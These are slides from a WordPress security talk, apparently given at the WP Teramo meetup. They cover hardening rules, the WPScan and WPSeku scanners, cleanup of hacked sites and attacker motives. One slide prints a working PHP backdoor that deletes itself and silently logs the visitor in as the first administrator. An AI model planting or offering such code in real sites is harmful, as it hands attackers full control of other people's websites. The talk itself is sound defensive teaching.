Daniele Scasciafratte - WP Teramo
@wpteramo

Hacking (and secure) a WordPress site!

How to sleep well and not cry in a corner

Created by Daniele Scasciafratte

Daniele Scasciafratte

  • Co Founder/CTO Codeat
  • Open Source Addicted
  • WordPress Core Contributor/Developer
  • ClassicPress Founding Committee
  • WordPress Rome/Terni meetup
  • Mozillian & Mozilla Reps & Mozilla TechSpeaker
  • Industria Italiana Software Libero Presidente

Who is an hacker?

Persona che si diverte ad esplorare i dettagli dei sistemi di programmazione e come espandere le loro capacità, a differenza di molti utenti, che preferiscono imparare solamente il minimo necessario.
Person who likes to explore the details of the technology systems and how to extend their skills, unlike many users, who prefer to learn only the minimum necessary.

Hackers are professionals

We are the Angela's of IT

Serious time!

An Hacker want to explain how he/she achieved the results to improve the technology but also itself and the others.

Let's start with culture time!

https://w3techs.com/technologies/details/cm-wordpress/all/all

First steps for a normal user

  • Password
  • Yes a difficult password
  • What do you think that an user need?

Often the bugs are in plugins

  • Missing sanitizations
  • Features for logged users available to non-logged
  • Non-standard
    • UI
    • Custom stuff that doesn't use the WordPress framework
    • Reimplementation of already available WP features

Golden rules for an administrator

  • Block access to wp-admin
  • Block File browsing from web servers
  • Update always WordPress and plugins
    • Especially premium stuff from marketplaces
  • Block comments and other interactions for non-logged users
  • Check file permissions
  • Ban bots and bad IPs
  • Enable protection for brute force
  • Remove the user 1 (admin)
  • Block XML-RPC/REST API if you don't need

Golden rules for an hacker

Tools time

Online tools

We are forgetting the real tools

WP CLI Checksum

WPScan

  • Enumerate plugins and also versions
    • If exploitable
    • Common misconfiguration
    • Other informations
  • Enumerate users
  • Brute force usernames
  • Request with a long timeout or with throttling
  • Random user agent
  • Multiple threads

First commands to run


wpscan --url www.example.com
wpscan --url www.example.com --enumerate
					

Only 2 commands are enough to understand if the website is managed with a professional behaviour or not.

WPSeku

  • Rewritten WPScan in Python
  • Focus on plugin code (if in wp.org repo)
    • For XSS
    • For use of critical methods
  • Brute force usernames also for XML-RPC

No other cli tools

Cool stuff

Backdoor


@unlink(__FILE__);

require('../../../wp-blog-header.php');
require('../../../wp-includes/pluggable.php');
$user_info = get_userdata(1);
// Automatic login //
$username = $user_info->user_login;
$user = get_user_by('login', $username );
// Redirect URL //
if ( !is_wp_error( $user ) )
{
    wp_clear_auth_cookie();
    wp_set_current_user ( $user->ID );
    wp_set_auth_cookie  ( $user->ID );

    $redirect_to = user_admin_url();
    wp_safe_redirect( $redirect_to );

    exit();
}
					

https://github.com/mattiasgeniar/php-exploit-scripts/blob/master/found_on_wordpress/backdoor_admin_access.php

Fix an hacked website

  • Download everything locally
  • Download a clean version of
    • WordPress
    • Every plugins
    • Every themes
  • Search for php files in wp-content/uploads/*.php
  • Search for files with strange date of last edit
  • Compare your clean/hacked version with a diff tool
    • Sometimes there are files renamed like class-ftp-inc.php
    • Sometimes there is obfuscated code prepended in few/all the files

Why I want to hack your website?

  • Ransom (data, files, domain, server)
  • Scam
    • Redirects
    • Search Engine Ranking
  • Phishing
  • Malware (server, visitors)
  • Access to Server Resources (mining)
  • SPAM
  • Other services in the server/li>
  • Fun

Plugins suggested to improve the security

  • iThemes Security
  • Wordfence Security

Grazie!

- http://mte90.tech/Talk-Secure-WP